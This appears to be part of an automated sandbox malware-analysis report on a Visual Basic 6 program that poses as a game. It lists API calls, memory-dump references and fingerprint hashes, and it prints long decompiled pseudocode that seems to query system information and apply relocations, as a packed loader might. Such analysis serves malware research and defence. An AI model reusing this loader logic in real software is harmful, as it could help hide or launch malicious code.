                                                        • __vbaVarTextCmpNe.MSVBVM60(?,?,?), ref: 0041EBEA
                                                        • __vbaVarVargNofree.MSVBVM60(?,00000000), ref: 0041EBFA
                                                        • __vbaVarTextCmpNe.MSVBVM60(?,00000000), ref: 0041EC05
                                                        • __vbaVarAnd.MSVBVM60(?,00000000), ref: 0041EC0C
                                                        • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0041EC13
                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041EC25
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041EC3B
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041EC60
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 0041EC71
                                                        • __vbaObjIs.MSVBVM60(?,00000000), ref: 0041EC8A
                                                        • __vbaObjIs.MSVBVM60(?,00000000), ref: 0041ECAF
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041ECD5
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041ECDF
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041ECE8
                                                        • __vbaFreeObj.MSVBVM60(0041EDA3), ref: 0041ED9B
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041EDA0
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$Addref$Text$BoolListNew2NofreeNullVarg
                                                        • String ID:
                                                        • API String ID: 1104298945-0
                                                        • Opcode ID: 7e6cefaa54a843e35a4180066d965740704f53dabcccb615c4431e20f7cd9adb
                                                        • Instruction ID: f1e13b1aa51e8554ba06be954cadd588f2b43fe81521c0aa416fbd403c300d70
                                                        • Opcode Fuzzy Hash: 7e6cefaa54a843e35a4180066d965740704f53dabcccb615c4431e20f7cd9adb
                                                        • Instruction Fuzzy Hash: 35812CB5900219AFCB10DF95DD89EEEBBB8FF48B00F104159F605F71A0D674A945CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 00425E58
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,027EF774,004104C8,00000014), ref: 00425E7D
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104E8,00000050), ref: 00425EA1
                                                        • __vbaStrCat.MSVBVM60(\Sounds\Click.wav,?,00000000,00000001), ref: 00425EB3
                                                        • __vbaStrMove.MSVBVM60 ref: 00425EBE
                                                        • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00425EC9
                                                        • __vbaSetSystemError.MSVBVM60(00000000), ref: 00425ED5
                                                        • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00425EE9
                                                        • __vbaFreeObj.MSVBVM60 ref: 00425EF5
                                                        • __vbaVarDup.MSVBVM60 ref: 00425F2D
                                                        • __vbaVarDup.MSVBVM60 ref: 00425F3F
                                                        • #595.MSVBVM60(?,00000004,?,?,?), ref: 00425F53
                                                        • __vbaStrI4.MSVBVM60(00000000), ref: 00425F5A
                                                        • __vbaStrMove.MSVBVM60 ref: 00425F65
                                                        • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00425F7D
                                                        • __vbaR8Str.MSVBVM60(?), ref: 00425F8A
                                                        • __vbaFreeStr.MSVBVM60(00425FFA), ref: 00425FF3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$CheckHresultListMove$#595AnsiErrorNew2System
                                                        • String ID: Are you sure you want to start a new game?$Aseb$\Sounds\Click.wav
                                                        • API String ID: 2274796182-1790726986
                                                        • Opcode ID: 7e048dabae48a738049e64f0c7c78aa2643a052cc66b563a88f36a7e692c6bc8
                                                        • Instruction ID: 4862316b511b408063ca9b18851ad709a6b62394f4d01c52bdd17cce92a381fa
                                                        • Opcode Fuzzy Hash: 7e048dabae48a738049e64f0c7c78aa2643a052cc66b563a88f36a7e692c6bc8
                                                        • Instruction Fuzzy Hash: A3511AB1D00209AFDB14DF94D989AEEBFB8FF58300F10416AE646B72A0DB785585CF64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 29%
                                                        			E004230D0(void* __ebx, void* __edi, void* __esi, signed int __fp0, signed int* _a4, intOrPtr _a12) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				char _v36;
                                                        				char _v52;
                                                        				intOrPtr _v192;
                                                        				intOrPtr _v220;
                                                        				signed int _v250;
                                                        				intOrPtr _v264;
                                                        				intOrPtr _v276;
                                                        				char _v284;
                                                        				char _v288;
                                                        				void _v304;
                                                        				intOrPtr _v328;
                                                        				char _v344;
                                                        				char _v348;
                                                        				intOrPtr _v352;
                                                        				char _v376;
                                                        				intOrPtr _v392;
                                                        				signed int _v400;
                                                        				char _v408;
                                                        				intOrPtr _v416;
                                                        				char _v424;
                                                        				char _v428;
                                                        				intOrPtr _v520;
                                                        				void _v580;
                                                        				void _v616;
                                                        				intOrPtr _v620;
                                                        				char _v628;
                                                        				void _v640;
                                                        				void* _v644;
                                                        				char _v648;
                                                        				int _v652;
                                                        				int _v656;
                                                        				char _v660;
                                                        				signed int _v664;
                                                        				char _v668;
                                                        				intOrPtr _v672;
                                                        				char _v676;
                                                        				intOrPtr _v680;
                                                        				intOrPtr _v684;
                                                        				short _v908;
                                                        				intOrPtr _v922;
                                                        				void _v924;
                                                        				signed int _v948;
                                                        				intOrPtr _v960;
                                                        				char _v964;
                                                        				char _v968;
                                                        				char _v972;
                                                        				intOrPtr _v984;
                                                        				intOrPtr _v1124;
                                                        				void _v1236;
                                                        				intOrPtr _v1240;
                                                        				intOrPtr _v1244;
                                                        				signed int _v1248;
                                                        				signed int _v1252;
                                                        				signed int _v1256;
                                                        				signed int _v1260;
                                                        				void* _v1264;
                                                        				signed int _v1268;
                                                        				signed int _v1272;
                                                        				signed int _v1276;
                                                        				signed int _v1280;
                                                        				signed int _v1284;
                                                        				intOrPtr _v1288;
                                                        				signed int _v1292;
                                                        				char _v1296;
                                                        				signed int _v1300;
                                                        				signed int _v1316;
                                                        				signed int _v1496;
                                                        				void _v1544;
                                                        				signed int _v1552;
                                                        				signed int _v1556;
                                                        				signed int _v1560;
                                                        				signed int _v1564;
                                                        				void* _v1568;
                                                        				signed int _v1572;
                                                        				char _v1576;
                                                        				signed int _v1580;
                                                        				signed int _v1584;
                                                        				signed int _v1592;
                                                        				char _v1596;
                                                        				intOrPtr _v1600;
                                                        				void _v1856;
                                                        				intOrPtr _v1860;
                                                        				intOrPtr _v1868;
                                                        				intOrPtr _v1872;
                                                        				void* _t216;
                                                        				intOrPtr _t221;
                                                        				signed int _t227;
                                                        				void* _t231;
                                                        				void* _t233;
                                                        				signed int _t234;
                                                        				void* _t236;
                                                        				void* _t238;
                                                        				void* _t241;
                                                        				void* _t244;
                                                        				void* _t246;
                                                        				void* _t250;
                                                        				signed int _t253;
                                                        				int _t255;
                                                        				signed int _t258;
                                                        				signed int _t259;
                                                        				void* _t261;
                                                        				signed int _t262;
                                                        				signed int _t265;
                                                        				signed int _t267;
                                                        				signed int _t268;
                                                        				void* _t270;
                                                        				signed int _t271;
                                                        				signed int _t273;
                                                        				signed int _t278;
                                                        				signed int _t280;
                                                        				signed int _t281;
                                                        				signed int _t286;
                                                        				signed int* _t287;
                                                        				signed int _t288;
                                                        				signed int _t290;
                                                        				signed int _t291;
                                                        				signed int _t293;
                                                        				signed int _t297;
                                                        				signed int _t304;
                                                        				signed int _t305;
                                                        				signed int _t306;
                                                        				void* _t307;
                                                        				intOrPtr _t309;
                                                        				signed int _t310;
                                                        				void* _t313;
                                                        				void* _t317;
                                                        				void* _t324;
                                                        				void* _t326;
                                                        				void* _t330;
                                                        				signed int _t333;
                                                        				signed int _t334;
                                                        				void* _t337;
                                                        				signed int _t339;
                                                        				signed int _t340;
                                                        				signed int _t341;
                                                        				intOrPtr _t342;
                                                        				void* _t344;
                                                        				void* _t346;
                                                        				signed int _t349;
                                                        				signed int _t354;
                                                        				signed int _t355;
                                                        				signed int _t357;
                                                        				void* _t359;
                                                        				signed int _t361;
                                                        				signed int _t365;
                                                        				signed int _t368;
                                                        				void* _t381;
                                                        				void* _t383;
                                                        				void* _t384;
                                                        				void* _t395;
                                                        				signed int* _t397;
                                                        				void* _t399;
                                                        				signed int _t401;
                                                        				intOrPtr* _t403;
                                                        				intOrPtr _t453;
                                                        				signed int _t454;
                                                        				signed int _t455;
                                                        				signed int _t457;
                                                        				signed int _t458;
                                                        				signed int _t460;
                                                        				signed int _t467;
                                                        				short _t491;
                                                        				signed int _t494;
                                                        				signed int _t502;
                                                        				signed int _t507;
                                                        				signed int _t515;
                                                        				intOrPtr* _t516;
                                                        				intOrPtr* _t517;
                                                        				void* _t524;
                                                        				void* _t528;
                                                        				signed int _t529;
                                                        				intOrPtr _t532;
                                                        				signed int _t536;
                                                        				intOrPtr* _t540;
                                                        				intOrPtr* _t553;
                                                        				intOrPtr* _t557;
                                                        				signed int _t558;
                                                        				intOrPtr _t559;
                                                        				intOrPtr _t561;
                                                        				signed int _t562;
                                                        				signed int _t564;
                                                        				signed int _t565;
                                                        				signed int _t566;
                                                        				signed int _t567;
                                                        				signed int _t568;
                                                        				signed int _t569;
                                                        				signed int _t577;
                                                        				intOrPtr* _t586;
                                                        				void* _t587;
                                                        				signed int _t588;
                                                        				signed int _t598;
                                                        				intOrPtr _t599;
                                                        				intOrPtr _t600;
                                                        				void* _t601;
                                                        				void* _t605;
                                                        				void* _t609;
                                                        				void* _t611;
                                                        				void* _t614;
                                                        				intOrPtr _t615;
                                                        				signed int _t637;
                                                        
                                                        				_t637 = __fp0;
                                                        				_t588 = _t598;
                                                        				_t599 = _t598 - 8;
                                                        				 *[fs:0x0] = _t599;
                                                        				_t600 = _t599 - 0x1a0;
                                                        				_v12 = _t600;
                                                        				_v8 = 0x401bb8;
                                                        				_t397 = _a4;
                                                        				memset( &_v304, 0, 0x3e << 2);
                                                        				_t601 = _t600 + 0xc;
                                                        				_v36 = 0;
                                                        				_v52 = 0;
                                                        				_v328 = 0;
                                                        				_v344 = 0;
                                                        				_v348 = 0;
                                                        				_v352 = 0;
                                                        				_t515 = 0;
                                                        				_v376 = 0;
                                                        				_v392 = 0;
                                                        				_v408 = 0;
                                                        				_v424 = 0;
                                                        				_v428 = 0;
                                                        				_t216 = L00423E30(_t397, 0, _t397);
                                                        				__imp____vbaCheckTypeVar( &_v344, 0x411a18,  &_v304, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t587);
                                                        				if(_t216 != 0) {
                                                        					__imp____vbaVarLateMemCallLd( &_v376,  &_v344, L"hwnd", 0);
                                                        					_t553 = __imp____vbaI4Var;
                                                        					_t601 = _t601 + 0x10;
                                                        					_v428 = 0;
                                                        					_t395 =  *_t553( &_v376,  *_t553( &_v52, 1,  &_v428));
                                                        					E0040F5DC();
                                                        					__imp____vbaSetSystemError(_t395);
                                                        					__imp____vbaFreeVar();
                                                        					_t515 =  ~(0 | _t395 > 0x00000000);
                                                        				}
                                                        				_v400 = _t515;
                                                        				_t516 = __imp____vbaVarMove;
                                                        				_v408 = 0xb;
                                                        				 *_t516();
                                                        				_push( &_v348);
                                                        				_push(_t397);
                                                        				L110();
                                                        				_push(_v348);
                                                        				E00423CC0(_t397, 0, _t588, _t397);
                                                        				_push(_v348);
                                                        				L11();
                                                        				_push(_v348);
                                                        				L45();
                                                        				_push(_v348);
                                                        				L82();
                                                        				_push(_v348);
                                                        				L22();
                                                        				_t221 = _a12;
                                                        				if(_t221 != 0) {
                                                        					_push(0x8000);
                                                        					_push(0);
                                                        					_push(_t221);
                                                        					E00423FF0();
                                                        				}
                                                        				__imp__#535();
                                                        				_v400 = _t637;
                                                        				_v408 = 4;
                                                        				 *_t516();
                                                        				_t557 = __imp____vbaVarTstLt;
                                                        				_t517 = __imp____vbaVarSub;
                                                        				while(1) {
                                                        					__imp__#535();
                                                        					_v400 = _t637;
                                                        					_v408 = 4;
                                                        					_v416 = 1;
                                                        					_v424 = 0x8002;
                                                        					_push( *_t517( &_v376,  &_v36,  &_v408));
                                                        					_push( &_v424);
                                                        					if( *_t557() == 0) {
                                                        						break;
                                                        					}
                                                        					__imp__#598();
                                                        				}
                                                        				_t227 = _v264 + _v348;
                                                        				__eflags = _t227;
                                                        				if(_t227 < 0) {
                                                        					__imp____vbaErrorOverflow();
                                                        					0;
                                                        					_push(0x8002);
                                                        					_v660 = 0;
                                                        					_push(_t557);
                                                        					_v656 = 0;
                                                        					_push(_t517);
                                                        					_v652 = 0;
                                                        					_v648 = 0;
                                                        					_t231 = memset( &_v580, memset( &_v616, memset( &_v640, 0, 6 << 2), 9 << 2), 0x12 << 2);
                                                        					_t605 = _t601 - 0x9c + 0x24;
                                                        					_t558 = 0;
                                                        					_t399 = 0;
                                                        					_v644 = _t231;
                                                        					_v664 = _t231;
                                                        					_t524 = E00424080();
                                                        					_t233 = E004240A0( &_v640);
                                                        					_push( &_v668);
                                                        					_push(0x18);
                                                        					_push(_t233);
                                                        					_push(0);
                                                        					_push(_t524);
                                                        					_t234 = E00424090();
                                                        					__eflags = _t234 - 0xc0000004;
                                                        					if(_t234 != 0xc0000004) {
                                                        						L16:
                                                        						__eflags = _t234;
                                                        						if(_t234 != 0) {
                                                        							_t399 = 6;
                                                        						}
                                                        						__eflags = _t558;
                                                        						if(_t558 != 0) {
                                                        							_t250 = E004240A0( &_v640);
                                                        							_push(0x18);
                                                        							_push(_t558);
                                                        							_push(_t250);
                                                        							E00424000();
                                                        						}
                                                        						_t236 = E004240A0( &_v660);
                                                        						_push(0x14);
                                                        						_push(_v640);
                                                        						_push(_t236);
                                                        						E00424000();
                                                        						_t559 = _v520;
                                                        						_v668 = _t559;
                                                        						_t238 = E004240A0( &_v676);
                                                        						_push(0x14);
                                                        						_push(_t238);
                                                        						_push(_v656);
                                                        						E00424000();
                                                        						_t241 = E004240A0( &_v648);
                                                        						_push(0x24);
                                                        						_push(_v684);
                                                        						_push(_t241);
                                                        						E00424000();
                                                        						_t244 = E004240A0( &_v628);
                                                        						_push(0x48);
                                                        						_push(_v656);
                                                        						_push(_t244);
                                                        						E00424000();
                                                        						_v620 = _t559;
                                                        						_t246 = E004240A0( &_v644);
                                                        						_push(0x48);
                                                        						_push(_t246);
                                                        						_push(_v672);
                                                        						E00424000();
                                                        						return _t399;
                                                        					} else {
                                                        						while(1) {
                                                        							_t253 = _v664 * 2;
                                                        							__eflags = _t253;
                                                        							if(_t253 < 0) {
                                                        								break;
                                                        							}
                                                        							__eflags = _t558;
                                                        							_v664 = _t253;
                                                        							if(_t558 != 0) {
                                                        								_t384 = E00424070();
                                                        								_push(_t558);
                                                        								_push(1);
                                                        								_push(_t384);
                                                        								E00424060();
                                                        							}
                                                        							_t381 = E00424070();
                                                        							_push(_v664);
                                                        							_push(1);
                                                        							_push(_t381);
                                                        							_t558 = E00424050();
                                                        							_t383 = E00424080();
                                                        							_push( &_v676);
                                                        							_push(_v676);
                                                        							_push(_t558);
                                                        							_push(0);
                                                        							_push(_t383);
                                                        							_t234 = E00424090();
                                                        							__eflags = _t234 - 0xc0000004;
                                                        							if(_t234 == 0xc0000004) {
                                                        								continue;
                                                        							} else {
                                                        								goto L16;
                                                        							}
                                                        							goto L136;
                                                        						}
                                                        						__imp____vbaErrorOverflow();
                                                        						_push(_t399);
                                                        						_push(_t588);
                                                        						_push(_t558);
                                                        						_push(_t524);
                                                        						_t401 = 0;
                                                        						_t255 = memset( &_v924, 0, 0x3e << 2);
                                                        						_t528 =  &_v964;
                                                        						memset(_t528, _t255, 0xa << 2);
                                                        						_t609 = _t605 - 0x124 + 0x18;
                                                        						_t529 = _t528 + 0xa;
                                                        						_push( &_v924);
                                                        						_v968 = 0;
                                                        						_t561 = 0;
                                                        						_t258 = L00423E30(0, 0, _v672);
                                                        						__eflags = _t258;
                                                        						if(_t258 != 0) {
                                                        							_t491 = _v908;
                                                        							_t259 = _t258 + 4;
                                                        							__eflags = _t259;
                                                        							if(_t259 < 0) {
                                                        								L44:
                                                        								__imp____vbaErrorOverflow();
                                                        								_push(_t401);
                                                        								_push(_t561);
                                                        								_push(_t529);
                                                        								_t261 = memset( &_v1236, 0, 0x3e << 2);
                                                        								_t611 = _t609 - 0x120 + 0xc;
                                                        								_t532 = _v984;
                                                        								_v1268 = _t261;
                                                        								_v1264 = _t261;
                                                        								_v1260 = _t261;
                                                        								_t562 = 0;
                                                        								_v1256 = _t261;
                                                        								_v1244 = 0;
                                                        								_push( &_v1236);
                                                        								_v1272 = 0;
                                                        								_v1252 = _t261;
                                                        								_v1276 = 0;
                                                        								_v1240 = 0;
                                                        								_t262 = L00423E30(_t401, 0, _t532);
                                                        								__eflags = _t262;
                                                        								if(_t262 != 0) {
                                                        									__eflags = _v1124 - 1;
                                                        									if(_v1124 <= 1) {
                                                        										L80:
                                                        										return _t562;
                                                        									} else {
                                                        										_push( &_v1248);
                                                        										_t265 = E00423F10(_t401, 0, _t532, 1);
                                                        										__eflags = _t265;
                                                        										if(_t265 != 0) {
                                                        											__eflags = _v1248;
                                                        											if(_v1248 <= 0) {
                                                        												goto L80;
                                                        											} else {
                                                        												_t267 = _v1252;
                                                        												__eflags = _t267;
                                                        												if(_t267 <= 0) {
                                                        													goto L80;
                                                        												} else {
                                                        													_t268 = _t267 + _t532;
                                                        													__eflags = _t268;
                                                        													if(_t268 < 0) {
                                                        														L81:
                                                        														__imp____vbaErrorOverflow();
                                                        														_push(_t588);
                                                        														_push(_t562);
                                                        														_push(_t532);
                                                        														_t270 = memset( &_v1544, 0, 0x3e << 2);
                                                        														_t614 = _t611 - 0x114 + 0xc;
                                                        														_t536 = _v1292;
                                                        														_t564 = 0;
                                                        														_v1568 = _t270;
                                                        														_v1556 = 0;
                                                        														_push( &_v1544);
                                                        														_v1572 = 0;
                                                        														_v1564 = _t270;
                                                        														_v1560 = 0;
                                                        														_v1552 = 0;
                                                        														_t271 = L00423E30(_t401, 0, _t536);
                                                        														__eflags = _t271;
                                                        														if(_t271 != 0) {
                                                        															_t494 = _v1496;
                                                        															_t273 = _t536 - _t494;
                                                        															__eflags = _t273;
                                                        															if(_t273 < 0) {
                                                        																L109:
                                                        																__imp____vbaErrorOverflow();
                                                        																_push(_t588);
                                                        																_t615 = _t614 - 8;
                                                        																_push(0x401d26);
                                                        																_push( *[fs:0x0]);
                                                        																 *[fs:0x0] = _t615;
                                                        																_push(_t401);
                                                        																_push(_t564);
                                                        																_push(_t536);
                                                        																_v1600 = _t615 - 0x11c;
                                                        																_v1596 = 0x401bc8;
                                                        																memset( &_v1856, 0, 0x3e << 2);
                                                        																_push( &_v1856);
                                                        																_v1860 = 0;
                                                        																_v1868 = 0;
                                                        																_v1872 = 0;
                                                        																_t278 = L00423E30(_t401, _t564, _v1584);
                                                        																__eflags = _t278;
                                                        																if(_t278 != 0) {
                                                        																	__eflags =  *0x42aa34; // 0x27ef774
                                                        																	if(__eflags == 0) {
                                                        																		__imp____vbaNew2(0x4104d8, 0x42aa34);
                                                        																	}
                                                        																	_t565 =  *0x42aa34; // 0x27ef774
                                                        																	_t280 =  *((intOrPtr*)( *_t565 + 0x48))(_t565, 0x1af6,  &_v284);
                                                        																	__eflags = _t280;
                                                        																	asm("fclex");
                                                        																	if(_t280 >= 0) {
                                                        																		_t403 = __imp____vbaHresultCheckObj;
                                                        																	} else {
                                                        																		_t403 = __imp____vbaHresultCheckObj;
                                                        																		 *_t403(_t280, _t565, 0x4104c8, 0x48);
                                                        																	}
                                                        																	__eflags =  *0x42aa34; // 0x27ef774
                                                        																	if(__eflags == 0) {
                                                        																		__imp____vbaNew2(0x4104d8, 0x42aa34);
                                                        																	}
                                                        																	_t566 =  *0x42aa34; // 0x27ef774
                                                        																	_t281 =  *((intOrPtr*)( *_t566 + 0x48))(_t566, 0x1af8,  &_v288);
                                                        																	__eflags = _t281;
                                                        																	asm("fclex");
                                                        																	if(_t281 < 0) {
                                                        																		 *_t403(_t281, _t566, 0x4104c8, 0x48);
                                                        																	}
                                                        																	_t540 = __imp____vbaI4Str;
                                                        																	_t286 = E00423FD0();
                                                        																	_t567 = _t286;
                                                        																	__imp____vbaFreeStrList(2,  &_v284,  &_v288, _v220, _v192,  *_t540(_v284,  *_t540(_v288)));
                                                        																	__eflags = _t567;
                                                        																	if(_t567 != 0) {
                                                        																		L134:
                                                        																		_t287 = _a4;
                                                        																		_push(0x423ca1);
                                                        																		 *_t287 = _t567;
                                                        																		return _t287;
                                                        																	} else {
                                                        																		__eflags = _v250 & 0x00000001;
                                                        																		if((_v250 & 0x00000001) == 0) {
                                                        																			_t288 =  *0x42aa34; // 0x27ef774
                                                        																			__eflags = _t288;
                                                        																			if(_t288 == 0) {
                                                        																				__imp____vbaNew2(0x4104d8, 0x42aa34);
                                                        																			}
                                                        																			_t568 =  *0x42aa34; // 0x27ef774
                                                        																			_t290 =  *((intOrPtr*)( *_t568 + 0x48))(_t568, 0x1af6,  &_v284);
                                                        																			__eflags = _t290;
                                                        																			asm("fclex");
                                                        																			if(_t290 < 0) {
                                                        																				 *_t403(_t290, _t568, 0x4104c8, 0x48);
                                                        																			}
                                                        																			_t291 =  *0x42aa34; // 0x27ef774
                                                        																			__eflags = _t291;
                                                        																			if(_t291 == 0) {
                                                        																				__imp____vbaNew2(0x4104d8, 0x42aa34);
                                                        																			}
                                                        																			_t569 =  *0x42aa34; // 0x27ef774
                                                        																			_t293 =  *((intOrPtr*)( *_t569 + 0x48))(_t569, 0x1af8,  &_v288);
                                                        																			__eflags = _t293;
                                                        																			asm("fclex");
                                                        																			if(_t293 < 0) {
                                                        																				 *_t403(_t293, _t569, 0x4104c8, 0x48);
                                                        																			}
                                                        																			_t297 = E00423FD0();
                                                        																			_t567 = _t297;
                                                        																			__imp____vbaFreeStrList(2,  &_v284,  &_v288, 0, _v192,  *_t540(_v284,  *_t540(_v288)));
                                                        																			__eflags = _t567;
                                                        																			if(_t567 != 0) {
                                                        																				goto L134;
                                                        																			}
                                                        																			_v276 = 3;
                                                        																			_push(0x423ca1);
                                                        																			return _t297;
                                                        																		}
                                                        																		_v276 = 3;
                                                        																		_push(0x423ca1);
                                                        																		return _t286;
                                                        																	}
                                                        																} else {
                                                        																	_v276 = 1;
                                                        																	_push(0x423ca1);
                                                        																	return _t278;
                                                        																}
                                                        															}
                                                        															__eflags = _t273;
                                                        															_v1552 = _t273;
                                                        															if(_t273 == 0) {
                                                        																L108:
                                                        																return _t564;
                                                        															} else {
                                                        																_push( &_v1560);
                                                        																_t304 = E00423F10(_t401, 0, _t536, 5);
                                                        																__eflags = _t304;
                                                        																if(_t304 != 0) {
                                                        																	__eflags = _v1560;
                                                        																	if(_v1560 <= 0) {
                                                        																		goto L108;
                                                        																	} else {
                                                        																		_t305 = _v1564;
                                                        																		__eflags = _t305;
                                                        																		if(_t305 <= 0) {
                                                        																			goto L108;
                                                        																		} else {
                                                        																			_t306 = _t305 + _t536;
                                                        																			__eflags = _t306;
                                                        																			if(_t306 < 0) {
                                                        																				goto L109;
                                                        																			}
                                                        																			_t588 = _t306;
                                                        																			_t307 = E004240A0( &_v1576);
                                                        																			_push(8);
                                                        																			_push(_t588);
                                                        																			_push(_t307);
                                                        																			E00424000();
                                                        																			__eflags = _v1592;
                                                        																			if(_v1592 == 0) {
                                                        																				goto L108;
                                                        																			} else {
                                                        																				_push(_t401);
                                                        																				while(1) {
                                                        																					_t453 = _v1572;
                                                        																					_t564 = _t588 + 8;
                                                        																					__eflags = _t564;
                                                        																					_t309 = _t453;
                                                        																					if(_t564 < 0) {
                                                        																						goto L109;
                                                        																					}
                                                        																					_t310 = _t309 - 8;
                                                        																					__eflags = _t310;
                                                        																					if(_t310 < 0) {
                                                        																						goto L109;
                                                        																					}
                                                        																					asm("cdq");
                                                        																					_t401 = _t310 - _t494 >> 1;
                                                        																					__eflags = _t401;
                                                        																					if(_t401 > 0) {
                                                        																						do {
                                                        																							_t502 =  &_v1568;
                                                        																							_t317 = E004240A0(_t502);
                                                        																							_push(2);
                                                        																							_push(_t564);
                                                        																							_push(_t317);
                                                        																							E00424000();
                                                        																							_t455 = _v1584;
                                                        																							asm("cdq");
                                                        																							_t494 = _t502 & 0x00000fff;
                                                        																							__eflags = (_t455 + _t494 >> 0x0000000c & 0x0000000f) - 3;
                                                        																							if((_t455 + _t494 >> 0x0000000c & 0x0000000f) == 3) {
                                                        																								_t457 = (_t455 & 0x00000fff) + _v1576;
                                                        																								__eflags = _t457;
                                                        																								if(_t457 < 0) {
                                                        																									goto L109;
                                                        																								}
                                                        																								_t458 = _t457 + _t536;
                                                        																								__eflags = _t458;
                                                        																								_push( &_v1580);
                                                        																								if(_t458 < 0) {
                                                        																									goto L109;
                                                        																								}
                                                        																								_t536 = _t458;
                                                        																								_t324 = E004240A0();
                                                        																								_push(4);
                                                        																								_push(_t536);
                                                        																								_push(_t324);
                                                        																								E00424000();
                                                        																								_t460 = _v1572 + _v1596;
                                                        																								__eflags = _t460;
                                                        																								_t494 =  &_v1596;
                                                        																								if(_t460 < 0) {
                                                        																									goto L109;
                                                        																								}
                                                        																								_v1580 = _t460;
                                                        																								_t326 = E004240A0(_t494);
                                                        																								_push(4);
                                                        																								_push(_t326);
                                                        																								_push(_t536);
                                                        																								E00424000();
                                                        																								_t536 = _v1316;
                                                        																							}
                                                        																							_t564 = _t564 + 2;
                                                        																							__eflags = _t564;
                                                        																							if(_t564 < 0) {
                                                        																								goto L109;
                                                        																							}
                                                        																							_t401 = _t401 - 1;
                                                        																							__eflags = _t401;
                                                        																							if(_t401 < 0) {
                                                        																								goto L109;
                                                        																							}
                                                        																							__eflags = _t401;
                                                        																						} while (_t401 > 0);
                                                        																						_t453 = _v1572;
                                                        																					}
                                                        																					_t454 = _t453 + _t588;
                                                        																					__eflags = _t454;
                                                        																					if(_t454 < 0) {
                                                        																						goto L109;
                                                        																					}
                                                        																					_t588 = _t454;
                                                        																					_t313 = E004240A0( &_v1576);
                                                        																					_push(8);
                                                        																					_push(_t588);
                                                        																					_push(_t313);
                                                        																					E00424000();
                                                        																					__eflags = _v1592;
                                                        																					if(_v1592 != 0) {
                                                        																						continue;
                                                        																					}
                                                        																					__eflags = 0;
                                                        																					return 0;
                                                        																					goto L136;
                                                        																				}
                                                        																				goto L109;
                                                        																			}
                                                        																		}
                                                        																	}
                                                        																} else {
                                                        																	return 2;
                                                        																}
                                                        															}
                                                        														} else {
                                                        															return 1;
                                                        														}
                                                        													} else {
                                                        														_t562 = _t268;
                                                        														while(1) {
                                                        															_v1256 = _t562;
                                                        															_t330 = E004240A0( &_v1276);
                                                        															_push(0x14);
                                                        															_push(_t562);
                                                        															_push(_t330);
                                                        															E00424000();
                                                        															__eflags = _v1292;
                                                        															_t333 = _v1280;
                                                        															if(_v1292 != 0) {
                                                        																goto L60;
                                                        															}
                                                        															__eflags = _v1260;
                                                        															if(_v1260 != 0) {
                                                        																goto L60;
                                                        															} else {
                                                        																__eflags = _v1268;
                                                        																if(_v1268 != 0) {
                                                        																	goto L60;
                                                        																} else {
                                                        																	__eflags = _t333;
                                                        																	if(__eflags != 0) {
                                                        																		L61:
                                                        																		if(__eflags <= 0) {
                                                        																			goto L76;
                                                        																		} else {
                                                        																			_t334 = _t333 + _t532;
                                                        																			__eflags = _t334;
                                                        																			if(_t334 < 0) {
                                                        																				goto L81;
                                                        																			} else {
                                                        																				_push(_t334);
                                                        																				_t401 = E00424030();
                                                        																				__eflags = _t401;
                                                        																				if(_t401 == 0) {
                                                        																					return 5;
                                                        																				} else {
                                                        																					_t577 = _v1276;
                                                        																					__eflags = _t577;
                                                        																					if(_t577 == 0) {
                                                        																						_t577 = _v1260;
                                                        																					}
                                                        																					_t562 = _t577 + _t532;
                                                        																					__eflags = _t562;
                                                        																					_push( &_v1284);
                                                        																					if(_t562 < 0) {
                                                        																						goto L81;
                                                        																					} else {
                                                        																						_t337 = E004240A0();
                                                        																						_push(4);
                                                        																						_push(_t562);
                                                        																						_push(_t337);
                                                        																						E00424000();
                                                        																						_t339 = _v1300;
                                                        																						__eflags = _t339;
                                                        																						while(__eflags != 0) {
                                                        																							if(__eflags >= 0) {
                                                        																								_t340 = _t339 + 2;
                                                        																								__eflags = _t340;
                                                        																								if(_t340 < 0) {
